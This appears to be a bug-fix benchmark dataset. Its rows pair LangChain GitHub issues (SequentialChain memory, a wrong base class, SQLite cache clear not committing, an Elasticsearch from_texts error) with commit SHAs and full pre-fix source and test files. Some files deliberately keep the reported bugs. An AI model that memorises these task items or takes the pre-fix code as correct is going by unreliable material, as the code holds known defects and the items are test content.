status
stringclasses
1 value
repo_name
stringclasses
31 values
repo_url
stringclasses
31 values
issue_id
int64
1
104k
title
stringlengths
4
369
body
stringlengths
0
254k
issue_url
stringlengths
37
56
pull_url
stringlengths
37
54
before_fix_sha
stringlengths
40
40
after_fix_sha
stringlengths
40
40
report_datetime
unknown
language
stringclasses
5 values
commit_datetime
unknown
updated_file
stringlengths
4
188
file_content
stringlengths
0
5.12M
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
6,768
Can't use memory for an internal LLMChain inside a SequentialChain
### System Info Langchain 0.0.214 Python 3.11.1 ### Who can help? @hwchase17 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1. Create a `SequentialChain` that contains 2 `LLMChain`s, and add a memory to the first one. 2. When running, you'll get a validation error: ``` Missing required input keys: {'chat_history'}, only had {'human_input'} (type=value_error) ``` ### Expected behavior You should be able to add memory to one chain, not just the Sequential Chain
https://github.com/langchain-ai/langchain/issues/6768
https://github.com/langchain-ai/langchain/pull/6769
488d2d5da95a2bacdca3d1623d862ac5ab28d59e
f307ca094b0d175d71ac424eba3d9f7ef5fc44f1
"2023-06-26T16:09:11Z"
python
"2023-07-13T06:47:44Z"
tests/unit_tests/chains/test_sequential.py
"""Test pipeline functionality.""" from typing import Dict, List, Optional import pytest from langchain.callbacks.manager import CallbackManagerForChainRun from langchain.chains.base import Chain from langchain.chains.sequential import SequentialChain, SimpleSequentialChain from langchain.memory.simple import SimpleMemory class FakeChain(Chain): """Fake Chain for testing purposes.""" input_variables: List[str] output_variables: List[str] @property def input_keys(self) -> List[str]: """Input keys this chain returns.""" return self.input_variables @property def output_keys(self) -> List[str]: """Input keys this chain returns.""" return self.output_variables def _call( self, inputs: Dict[str, str], run_manager: Optional[CallbackManagerForChainRun] = None, ) -> Dict[str, str]: outputs = {} for var in self.output_variables: variables = [inputs[k] for k in self.input_variables] outputs[var] = f"{' '.join(variables)}foo" return outputs def test_sequential_usage_single_inputs() -> None: """Test sequential on single input chains.""" chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"]) chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"]) chain = SequentialChain(chains=[chain_1, chain_2], input_variables=["foo"]) output = chain({"foo": "123"}) expected_output = {"baz": "123foofoo", "foo": "123"} assert output == expected_output def test_sequential_usage_multiple_inputs() -> None: """Test sequential on multiple input chains.""" chain_1 = FakeChain(input_variables=["foo", "test"], output_variables=["bar"]) chain_2 = FakeChain(input_variables=["bar", "foo"], output_variables=["baz"]) chain = SequentialChain(chains=[chain_1, chain_2], input_variables=["foo", "test"]) output = chain({"foo": "123", "test": "456"}) expected_output = { "baz": "123 456foo 123foo", "foo": "123", "test": "456", } assert output == expected_output def test_sequential_usage_memory() -> None: """Test sequential usage with memory.""" memory = SimpleMemory(memories={"zab": "rab"}) chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"]) chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"]) chain = SequentialChain( memory=memory, chains=[chain_1, chain_2], input_variables=["foo"] ) output = chain({"foo": "123"}) expected_output = {"baz": "123foofoo", "foo": "123", "zab": "rab"} assert output == expected_output memory = SimpleMemory(memories={"zab": "rab", "foo": "rab"}) chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"]) chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"]) with pytest.raises(ValueError): SequentialChain( memory=memory, chains=[chain_1, chain_2], input_variables=["foo"] ) def test_sequential_usage_multiple_outputs() -> None: """Test sequential usage on multiple output chains.""" chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar", "test"]) chain_2 = FakeChain(input_variables=["bar", "foo"], output_variables=["baz"]) chain = SequentialChain(chains=[chain_1, chain_2], input_variables=["foo"]) output = chain({"foo": "123"}) expected_output = { "baz": "123foo 123foo", "foo": "123", } assert output == expected_output def test_sequential_missing_inputs() -> None: """Test error is raised when input variables are missing.""" chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"]) chain_2 = FakeChain(input_variables=["bar", "test"], output_variables=["baz"]) with pytest.raises(ValueError): # Also needs "test" as an input SequentialChain(chains=[chain_1, chain_2], input_variables=["foo"]) def test_sequential_bad_outputs() -> None: """Test error is raised when bad outputs are specified.""" chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"]) chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"]) with pytest.raises(ValueError): # "test" is not present as an output variable. SequentialChain( chains=[chain_1, chain_2], input_variables=["foo"], output_variables=["test"], ) def test_sequential_valid_outputs() -> None: """Test chain runs when valid outputs are specified.""" chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"]) chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"]) chain = SequentialChain( chains=[chain_1, chain_2], input_variables=["foo"], output_variables=["bar", "baz"], ) output = chain({"foo": "123"}, return_only_outputs=True) expected_output = {"baz": "123foofoo", "bar": "123foo"} assert output == expected_output def test_sequential_overlapping_inputs() -> None: """Test error is raised when input variables are overlapping.""" chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar", "test"]) chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"]) with pytest.raises(ValueError): # "test" is specified as an input, but also is an output of one step SequentialChain(chains=[chain_1, chain_2], input_variables=["foo", "test"]) def test_simple_sequential_functionality() -> None: """Test simple sequential functionality.""" chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"]) chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"]) chain = SimpleSequentialChain(chains=[chain_1, chain_2]) output = chain({"input": "123"}) expected_output = {"output": "123foofoo", "input": "123"} assert output == expected_output def test_multi_input_errors() -> None: """Test simple sequential errors if multiple input variables are expected.""" chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"]) chain_2 = FakeChain(input_variables=["bar", "foo"], output_variables=["baz"]) with pytest.raises(ValueError): SimpleSequentialChain(chains=[chain_1, chain_2]) def test_multi_output_errors() -> None: """Test simple sequential errors if multiple output variables are expected.""" chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar", "grok"]) chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"]) with pytest.raises(ValueError): SimpleSequentialChain(chains=[chain_1, chain_2])
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
6,231
correct the base class
https://github.com/hwchase17/langchain/blob/c7db9febb0edeba1ea108adc4423b789404ce5f2/langchain/experimental/plan_and_execute/schema.py#L31 From `class ListStepContainer(BaseModel):` To `class ListStepContainer(BaseStepContainer):`
https://github.com/langchain-ai/langchain/issues/6231
https://github.com/langchain-ai/langchain/pull/6232
98e1bbfbbdffca55775e847899d2823f6232ebe7
af3f4010155a882b8b1021b6e0de130c628dab2c
"2023-06-15T15:16:56Z"
python
"2023-07-13T07:03:02Z"
langchain/experimental/plan_and_execute/schema.py
from abc import abstractmethod from typing import List, Tuple from pydantic import BaseModel, Field from langchain.schema import BaseOutputParser class Step(BaseModel): value: str class Plan(BaseModel): steps: List[Step] class StepResponse(BaseModel): response: str class BaseStepContainer(BaseModel): @abstractmethod def add_step(self, step: Step, step_response: StepResponse) -> None: """Add step and step response to the container.""" @abstractmethod def get_final_response(self) -> str: """Return the final response based on steps taken.""" class ListStepContainer(BaseModel): steps: List[Tuple[Step, StepResponse]] = Field(default_factory=list) def add_step(self, step: Step, step_response: StepResponse) -> None: self.steps.append((step, step_response)) def get_steps(self) -> List[Tuple[Step, StepResponse]]: return self.steps def get_final_response(self) -> str: return self.steps[-1][1].response class PlanOutputParser(BaseOutputParser): @abstractmethod def parse(self, text: str) -> Plan: """Parse into a plan."""
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,652
SQLite LLM cache clear does not take effect
### System Info Langchain version: 0.0.231 Python version: 3.10.11 Bug: There is an issue when clearing LLM cache for SQL Alchemy based caches. langchain.llm_cache.clear() does not clear the cache for SQLite LLM cache. Reason: it doesn't commit the deletion database change. The deletion doesn't take effect. ### Who can help? @hwchase17 @ag ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction - Configure SQLite LLM Cache - Call an LLM via langchain - The SQLite database get's populated with an entry - call langchain.llm_cache.clear() - Actual Behaviour: Notice that the entry is still in SQLite ### Expected behavior - Expected Behaviour: The cache database table should be empty
https://github.com/langchain-ai/langchain/issues/7652
https://github.com/langchain-ai/langchain/pull/7653
c17a80f11c200e2f7a65b54eb2f2942b8a6ea3bd
24c165420827305e813f4b6d501f93d18f6d46a4
"2023-07-13T12:36:48Z"
python
"2023-07-13T13:39:04Z"
langchain/cache.py
"""Beta Feature: base interface for cache.""" from __future__ import annotations import hashlib import inspect import json import logging from abc import ABC, abstractmethod from datetime import timedelta from typing import ( TYPE_CHECKING, Any, Callable, Dict, Optional, Sequence, Tuple, Type, Union, cast, ) from sqlalchemy import Column, Integer, String, create_engine, select from sqlalchemy.engine.base import Engine from sqlalchemy.orm import Session from langchain.utils import get_from_env try: from sqlalchemy.orm import declarative_base except ImportError: from sqlalchemy.ext.declarative import declarative_base from langchain.embeddings.base import Embeddings from langchain.load.dump import dumps from langchain.load.load import loads from langchain.schema import Generation from langchain.vectorstores.redis import Redis as RedisVectorstore logger = logging.getLogger(__file__) if TYPE_CHECKING: import momento RETURN_VAL_TYPE = Sequence[Generation] def _hash(_input: str) -> str: """Use a deterministic hashing approach.""" return hashlib.md5(_input.encode()).hexdigest() def _dump_generations_to_json(generations: RETURN_VAL_TYPE) -> str: """Dump generations to json. Args: generations (RETURN_VAL_TYPE): A list of language model generations. Returns: str: Json representing a list of generations. """ return json.dumps([generation.dict() for generation in generations]) def _load_generations_from_json(generations_json: str) -> RETURN_VAL_TYPE: """Load generations from json. Args: generations_json (str): A string of json representing a list of generations. Raises: ValueError: Could not decode json string to list of generations. Returns: RETURN_VAL_TYPE: A list of generations. """ try: results = json.loads(generations_json) return [Generation(**generation_dict) for generation_dict in results] except json.JSONDecodeError: raise ValueError( f"Could not decode json to list of generations: {generations_json}" ) class BaseCache(ABC): """Base interface for cache.""" @abstractmethod def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" @abstractmethod def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache based on prompt and llm_string.""" @abstractmethod def clear(self, **kwargs: Any) -> None: """Clear cache that can take additional keyword arguments.""" class InMemoryCache(BaseCache): """Cache that stores things in memory.""" def __init__(self) -> None: """Initialize with empty cache.""" self._cache: Dict[Tuple[str, str], RETURN_VAL_TYPE] = {} def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" return self._cache.get((prompt, llm_string), None) def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache based on prompt and llm_string.""" self._cache[(prompt, llm_string)] = return_val def clear(self, **kwargs: Any) -> None: """Clear cache.""" self._cache = {} Base = declarative_base() class FullLLMCache(Base): # type: ignore """SQLite table for full LLM Cache (all generations).""" __tablename__ = "full_llm_cache" prompt = Column(String, primary_key=True) llm = Column(String, primary_key=True) idx = Column(Integer, primary_key=True) response = Column(String) class SQLAlchemyCache(BaseCache): """Cache that uses SQAlchemy as a backend.""" def __init__(self, engine: Engine, cache_schema: Type[FullLLMCache] = FullLLMCache): """Initialize by creating all tables.""" self.engine = engine self.cache_schema = cache_schema self.cache_schema.metadata.create_all(self.engine) def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" stmt = ( select(self.cache_schema.response) .where(self.cache_schema.prompt == prompt) # type: ignore .where(self.cache_schema.llm == llm_string) .order_by(self.cache_schema.idx) ) with Session(self.engine) as session: rows = session.execute(stmt).fetchall() if rows: try: return [loads(row[0]) for row in rows] except Exception: logger.warning( "Retrieving a cache value that could not be deserialized " "properly. This is likely due to the cache being in an " "older format. Please recreate your cache to avoid this " "error." ) # In a previous life we stored the raw text directly # in the table, so assume it's in that format. return [Generation(text=row[0]) for row in rows] return None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update based on prompt and llm_string.""" items = [ self.cache_schema(prompt=prompt, llm=llm_string, response=dumps(gen), idx=i) for i, gen in enumerate(return_val) ] with Session(self.engine) as session, session.begin(): for item in items: session.merge(item) def clear(self, **kwargs: Any) -> None: """Clear cache.""" with Session(self.engine) as session: session.query(self.cache_schema).delete() class SQLiteCache(SQLAlchemyCache): """Cache that uses SQLite as a backend.""" def __init__(self, database_path: str = ".langchain.db"): """Initialize by creating the engine and all tables.""" engine = create_engine(f"sqlite:///{database_path}") super().__init__(engine) class RedisCache(BaseCache): """Cache that uses Redis as a backend.""" # TODO - implement a TTL policy in Redis def __init__(self, redis_: Any): """Initialize by passing in Redis instance.""" try: from redis import Redis except ImportError: raise ValueError( "Could not import redis python package. " "Please install it with `pip install redis`." ) if not isinstance(redis_, Redis): raise ValueError("Please pass in Redis object.") self.redis = redis_ def _key(self, prompt: str, llm_string: str) -> str: """Compute key from prompt and llm_string""" return _hash(prompt + llm_string) def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" generations = [] # Read from a Redis HASH results = self.redis.hgetall(self._key(prompt, llm_string)) if results: for _, text in results.items(): generations.append(Generation(text=text)) return generations if generations else None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache based on prompt and llm_string.""" for gen in return_val: if not isinstance(gen, Generation): raise ValueError( "RedisCache only supports caching of normal LLM generations, " f"got {type(gen)}" ) # Write to a Redis HASH key = self._key(prompt, llm_string) self.redis.hset( key, mapping={ str(idx): generation.text for idx, generation in enumerate(return_val) }, ) def clear(self, **kwargs: Any) -> None: """Clear cache. If `asynchronous` is True, flush asynchronously.""" asynchronous = kwargs.get("asynchronous", False) self.redis.flushdb(asynchronous=asynchronous, **kwargs) class RedisSemanticCache(BaseCache): """Cache that uses Redis as a vector-store backend.""" # TODO - implement a TTL policy in Redis def __init__( self, redis_url: str, embedding: Embeddings, score_threshold: float = 0.2 ): """Initialize by passing in the `init` GPTCache func Args: redis_url (str): URL to connect to Redis. embedding (Embedding): Embedding provider for semantic encoding and search. score_threshold (float, 0.2): Example: .. code-block:: python import langchain from langchain.cache import RedisSemanticCache from langchain.embeddings import OpenAIEmbeddings langchain.llm_cache = RedisSemanticCache( redis_url="redis://localhost:6379", embedding=OpenAIEmbeddings() ) """ self._cache_dict: Dict[str, RedisVectorstore] = {} self.redis_url = redis_url self.embedding = embedding self.score_threshold = score_threshold def _index_name(self, llm_string: str) -> str: hashed_index = _hash(llm_string) return f"cache:{hashed_index}" def _get_llm_cache(self, llm_string: str) -> RedisVectorstore: index_name = self._index_name(llm_string) # return vectorstore client for the specific llm string if index_name in self._cache_dict: return self._cache_dict[index_name] # create new vectorstore client for the specific llm string try: self._cache_dict[index_name] = RedisVectorstore.from_existing_index( embedding=self.embedding, index_name=index_name, redis_url=self.redis_url, ) except ValueError: redis = RedisVectorstore( embedding_function=self.embedding.embed_query, index_name=index_name, redis_url=self.redis_url, ) _embedding = self.embedding.embed_query(text="test") redis._create_index(dim=len(_embedding)) self._cache_dict[index_name] = redis return self._cache_dict[index_name] def clear(self, **kwargs: Any) -> None: """Clear semantic cache for a given llm_string.""" index_name = self._index_name(kwargs["llm_string"]) if index_name in self._cache_dict: self._cache_dict[index_name].drop_index( index_name=index_name, delete_documents=True, redis_url=self.redis_url ) del self._cache_dict[index_name] def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" llm_cache = self._get_llm_cache(llm_string) generations = [] # Read from a Hash results = llm_cache.similarity_search_limit_score( query=prompt, k=1, score_threshold=self.score_threshold, ) if results: for document in results: for text in document.metadata["return_val"]: generations.append(Generation(text=text)) return generations if generations else None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache based on prompt and llm_string.""" for gen in return_val: if not isinstance(gen, Generation): raise ValueError( "RedisSemanticCache only supports caching of " f"normal LLM generations, got {type(gen)}" ) llm_cache = self._get_llm_cache(llm_string) # Write to vectorstore metadata = { "llm_string": llm_string, "prompt": prompt, "return_val": [generation.text for generation in return_val], } llm_cache.add_texts(texts=[prompt], metadatas=[metadata]) class GPTCache(BaseCache): """Cache that uses GPTCache as a backend.""" def __init__( self, init_func: Union[ Callable[[Any, str], None], Callable[[Any], None], None ] = None, ): """Initialize by passing in init function (default: `None`). Args: init_func (Optional[Callable[[Any], None]]): init `GPTCache` function (default: `None`) Example: .. code-block:: python # Initialize GPTCache with a custom init function import gptcache from gptcache.processor.pre import get_prompt from gptcache.manager.factory import get_data_manager # Avoid multiple caches using the same file, causing different llm model caches to affect each other def init_gptcache(cache_obj: gptcache.Cache, llm str): cache_obj.init( pre_embedding_func=get_prompt, data_manager=manager_factory( manager="map", data_dir=f"map_cache_{llm}" ), ) langchain.llm_cache = GPTCache(init_gptcache) """ try: import gptcache # noqa: F401 except ImportError: raise ImportError( "Could not import gptcache python package. " "Please install it with `pip install gptcache`." ) self.init_gptcache_func: Union[ Callable[[Any, str], None], Callable[[Any], None], None ] = init_func self.gptcache_dict: Dict[str, Any] = {} def _new_gptcache(self, llm_string: str) -> Any: """New gptcache object""" from gptcache import Cache from gptcache.manager.factory import get_data_manager from gptcache.processor.pre import get_prompt _gptcache = Cache() if self.init_gptcache_func is not None: sig = inspect.signature(self.init_gptcache_func) if len(sig.parameters) == 2: self.init_gptcache_func(_gptcache, llm_string) # type: ignore[call-arg] else: self.init_gptcache_func(_gptcache) # type: ignore[call-arg] else: _gptcache.init( pre_embedding_func=get_prompt, data_manager=get_data_manager(data_path=llm_string), ) self.gptcache_dict[llm_string] = _gptcache return _gptcache def _get_gptcache(self, llm_string: str) -> Any: """Get a cache object. When the corresponding llm model cache does not exist, it will be created.""" return self.gptcache_dict.get(llm_string, self._new_gptcache(llm_string)) def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up the cache data. First, retrieve the corresponding cache object using the `llm_string` parameter, and then retrieve the data from the cache based on the `prompt`. """ from gptcache.adapter.api import get _gptcache = self.gptcache_dict.get(llm_string, None) if _gptcache is None: return None res = get(prompt, cache_obj=_gptcache) if res: return [ Generation(**generation_dict) for generation_dict in json.loads(res) ] return None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache. First, retrieve the corresponding cache object using the `llm_string` parameter, and then store the `prompt` and `return_val` in the cache object. """ for gen in return_val: if not isinstance(gen, Generation): raise ValueError( "GPTCache only supports caching of normal LLM generations, " f"got {type(gen)}" ) from gptcache.adapter.api import put _gptcache = self._get_gptcache(llm_string) handled_data = json.dumps([generation.dict() for generation in return_val]) put(prompt, handled_data, cache_obj=_gptcache) return None def clear(self, **kwargs: Any) -> None: """Clear cache.""" from gptcache import Cache for gptcache_instance in self.gptcache_dict.values(): gptcache_instance = cast(Cache, gptcache_instance) gptcache_instance.flush() self.gptcache_dict.clear() def _ensure_cache_exists(cache_client: momento.CacheClient, cache_name: str) -> None: """Create cache if it doesn't exist. Raises: SdkException: Momento service or network error Exception: Unexpected response """ from momento.responses import CreateCache create_cache_response = cache_client.create_cache(cache_name) if isinstance(create_cache_response, CreateCache.Success) or isinstance( create_cache_response, CreateCache.CacheAlreadyExists ): return None elif isinstance(create_cache_response, CreateCache.Error): raise create_cache_response.inner_exception else: raise Exception(f"Unexpected response cache creation: {create_cache_response}") def _validate_ttl(ttl: Optional[timedelta]) -> None: if ttl is not None and ttl <= timedelta(seconds=0): raise ValueError(f"ttl must be positive but was {ttl}.") class MomentoCache(BaseCache): """Cache that uses Momento as a backend. See https://gomomento.com/""" def __init__( self, cache_client: momento.CacheClient, cache_name: str, *, ttl: Optional[timedelta] = None, ensure_cache_exists: bool = True, ): """Instantiate a prompt cache using Momento as a backend. Note: to instantiate the cache client passed to MomentoCache, you must have a Momento account. See https://gomomento.com/. Args: cache_client (CacheClient): The Momento cache client. cache_name (str): The name of the cache to use to store the data. ttl (Optional[timedelta], optional): The time to live for the cache items. Defaults to None, ie use the client default TTL. ensure_cache_exists (bool, optional): Create the cache if it doesn't exist. Defaults to True. Raises: ImportError: Momento python package is not installed. TypeError: cache_client is not of type momento.CacheClientObject ValueError: ttl is non-null and non-negative """ try: from momento import CacheClient except ImportError: raise ImportError( "Could not import momento python package. " "Please install it with `pip install momento`." ) if not isinstance(cache_client, CacheClient): raise TypeError("cache_client must be a momento.CacheClient object.") _validate_ttl(ttl) if ensure_cache_exists: _ensure_cache_exists(cache_client, cache_name) self.cache_client = cache_client self.cache_name = cache_name self.ttl = ttl @classmethod def from_client_params( cls, cache_name: str, ttl: timedelta, *, configuration: Optional[momento.config.Configuration] = None, auth_token: Optional[str] = None, **kwargs: Any, ) -> MomentoCache: """Construct cache from CacheClient parameters.""" try: from momento import CacheClient, Configurations, CredentialProvider except ImportError: raise ImportError( "Could not import momento python package. " "Please install it with `pip install momento`." ) if configuration is None: configuration = Configurations.Laptop.v1() auth_token = auth_token or get_from_env("auth_token", "MOMENTO_AUTH_TOKEN") credentials = CredentialProvider.from_string(auth_token) cache_client = CacheClient(configuration, credentials, default_ttl=ttl) return cls(cache_client, cache_name, ttl=ttl, **kwargs) def __key(self, prompt: str, llm_string: str) -> str: """Compute cache key from prompt and associated model and settings. Args: prompt (str): The prompt run through the language model. llm_string (str): The language model version and settings. Returns: str: The cache key. """ return _hash(prompt + llm_string) def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Lookup llm generations in cache by prompt and associated model and settings. Args: prompt (str): The prompt run through the language model. llm_string (str): The language model version and settings. Raises: SdkException: Momento service or network error Returns: Optional[RETURN_VAL_TYPE]: A list of language model generations. """ from momento.responses import CacheGet generations: RETURN_VAL_TYPE = [] get_response = self.cache_client.get( self.cache_name, self.__key(prompt, llm_string) ) if isinstance(get_response, CacheGet.Hit): value = get_response.value_string generations = _load_generations_from_json(value) elif isinstance(get_response, CacheGet.Miss): pass elif isinstance(get_response, CacheGet.Error): raise get_response.inner_exception return generations if generations else None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Store llm generations in cache. Args: prompt (str): The prompt run through the language model. llm_string (str): The language model string. return_val (RETURN_VAL_TYPE): A list of language model generations. Raises: SdkException: Momento service or network error Exception: Unexpected response """ for gen in return_val: if not isinstance(gen, Generation): raise ValueError( "Momento only supports caching of normal LLM generations, " f"got {type(gen)}" ) key = self.__key(prompt, llm_string) value = _dump_generations_to_json(return_val) set_response = self.cache_client.set(self.cache_name, key, value, self.ttl) from momento.responses import CacheSet if isinstance(set_response, CacheSet.Success): pass elif isinstance(set_response, CacheSet.Error): raise set_response.inner_exception else: raise Exception(f"Unexpected response: {set_response}") def clear(self, **kwargs: Any) -> None: """Clear the cache. Raises: SdkException: Momento service or network error """ from momento.responses import CacheFlush flush_response = self.cache_client.flush_cache(self.cache_name) if isinstance(flush_response, CacheFlush.Success): pass elif isinstance(flush_response, CacheFlush.Error): raise flush_response.inner_exception
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,652
SQLite LLM cache clear does not take effect
### System Info Langchain version: 0.0.231 Python version: 3.10.11 Bug: There is an issue when clearing LLM cache for SQL Alchemy based caches. langchain.llm_cache.clear() does not clear the cache for SQLite LLM cache. Reason: it doesn't commit the deletion database change. The deletion doesn't take effect. ### Who can help? @hwchase17 @ag ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction - Configure SQLite LLM Cache - Call an LLM via langchain - The SQLite database get's populated with an entry - call langchain.llm_cache.clear() - Actual Behaviour: Notice that the entry is still in SQLite ### Expected behavior - Expected Behaviour: The cache database table should be empty
https://github.com/langchain-ai/langchain/issues/7652
https://github.com/langchain-ai/langchain/pull/7653
c17a80f11c200e2f7a65b54eb2f2942b8a6ea3bd
24c165420827305e813f4b6d501f93d18f6d46a4
"2023-07-13T12:36:48Z"
python
"2023-07-13T13:39:04Z"
tests/unit_tests/test_cache.py
"""Test caching for LLMs and ChatModels.""" from typing import Dict, Generator, List, Union import pytest from _pytest.fixtures import FixtureRequest from sqlalchemy import create_engine from sqlalchemy.orm import Session import langchain from langchain.cache import ( InMemoryCache, SQLAlchemyCache, ) from langchain.chat_models import FakeListChatModel from langchain.chat_models.base import BaseChatModel, dumps from langchain.llms import FakeListLLM from langchain.llms.base import BaseLLM from langchain.schema import ( ChatGeneration, Generation, ) from langchain.schema.messages import AIMessage, BaseMessage, HumanMessage def get_sqlite_cache() -> SQLAlchemyCache: return SQLAlchemyCache(engine=create_engine("sqlite://")) CACHE_OPTIONS = [ InMemoryCache, get_sqlite_cache, ] @pytest.fixture(autouse=True, params=CACHE_OPTIONS) def set_cache_and_teardown(request: FixtureRequest) -> Generator[None, None, None]: # Will be run before each test cache_instance = request.param langchain.llm_cache = cache_instance() if langchain.llm_cache: langchain.llm_cache.clear() else: raise ValueError("Cache not set. This should never happen.") yield # Will be run after each test if langchain.llm_cache: langchain.llm_cache.clear() langchain.llm_cache = None else: raise ValueError("Cache not set. This should never happen.") def test_llm_caching() -> None: prompt = "How are you?" response = "Test response" cached_response = "Cached test response" llm = FakeListLLM(responses=[response]) if langchain.llm_cache: langchain.llm_cache.update( prompt=prompt, llm_string=create_llm_string(llm), return_val=[Generation(text=cached_response)], ) assert llm(prompt) == cached_response else: raise ValueError( "The cache not set. This should never happen, as the pytest fixture " "`set_cache_and_teardown` always sets the cache." ) def test_old_sqlite_llm_caching() -> None: if isinstance(langchain.llm_cache, SQLAlchemyCache): prompt = "How are you?" response = "Test response" cached_response = "Cached test response" llm = FakeListLLM(responses=[response]) items = [ langchain.llm_cache.cache_schema( prompt=prompt, llm=create_llm_string(llm), response=cached_response, idx=0, ) ] with Session(langchain.llm_cache.engine) as session, session.begin(): for item in items: session.merge(item) assert llm(prompt) == cached_response def test_chat_model_caching() -> None: prompt: List[BaseMessage] = [HumanMessage(content="How are you?")] response = "Test response" cached_response = "Cached test response" cached_message = AIMessage(content=cached_response) llm = FakeListChatModel(responses=[response]) if langchain.llm_cache: langchain.llm_cache.update( prompt=dumps(prompt), llm_string=llm._get_llm_string(), return_val=[ChatGeneration(message=cached_message)], ) result = llm(prompt) assert isinstance(result, AIMessage) assert result.content == cached_response else: raise ValueError( "The cache not set. This should never happen, as the pytest fixture " "`set_cache_and_teardown` always sets the cache." ) def test_chat_model_caching_params() -> None: prompt: List[BaseMessage] = [HumanMessage(content="How are you?")] response = "Test response" cached_response = "Cached test response" cached_message = AIMessage(content=cached_response) llm = FakeListChatModel(responses=[response]) if langchain.llm_cache: langchain.llm_cache.update( prompt=dumps(prompt), llm_string=llm._get_llm_string(functions=[]), return_val=[ChatGeneration(message=cached_message)], ) result = llm(prompt, functions=[]) assert isinstance(result, AIMessage) assert result.content == cached_response result_no_params = llm(prompt) assert isinstance(result_no_params, AIMessage) assert result_no_params.content == response else: raise ValueError( "The cache not set. This should never happen, as the pytest fixture " "`set_cache_and_teardown` always sets the cache." ) def create_llm_string(llm: Union[BaseLLM, BaseChatModel]) -> str: _dict: Dict = llm.dict() _dict["stop"] = None return str(sorted([(k, v) for k, v in _dict.items()]))
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
6,198
Elasticsearch : ElasticKnnSearch.from_texts throws AttributeError
### System Info Langchain version : 0.0.199 Python Version: Python 3.9.16 MacOS @CodeDevNinja @dev2049 PR https://github.com/hwchase17/langchain/pull/5058 introduced a change to ElasticVectorSearch from_texts which broke, kind of coincidentally, ElasticKnnSearch from_texts I discovered this issue when running docs/modules/indexes/vectorstores/examples/elasticsearch.ipynb . I got to the following cell: ```python # Test `add_texts` method texts = ["Hello, world!", "Machine learning is fun.", "I love Python."] knn_search.add_texts(texts) # Test `from_texts` method new_texts = ["This is a new text.", "Elasticsearch is powerful.", "Python is great for data analysis."] knn_search.from_texts(new_texts, embeddings, elasticsearch_url=elasticsearch_url) ``` and it said: ```python --------------------------------------------------------------------------- AttributeError Traceback (most recent call last) Cell In[10], line 7 5 # Test `from_texts` method 6 new_texts = ["This is a new text.", "Elasticsearch is powerful.", "Python is great for data analysis."] ----> 7 knn_search.from_texts(new_texts, embeddings, elasticsearch_url=elasticsearch_url) File ~/dev/github/langchain/langchain/vectorstores/elastic_vector_search.py:296, in ElasticVectorSearch.from_texts(cls, texts, embedding, metadatas, elasticsearch_url, index_name, refresh_indices, **kwargs) 293 index_name = index_name or uuid.uuid4().hex 294 vectorsearch = cls( 295 elasticsearch_url, index_name, embedding, **kwargs) --> 296 vectorsearch.add_texts( 297 texts, metadatas=metadatas, refresh_indices=refresh_indices 298 ) 299 return vectorsearch File 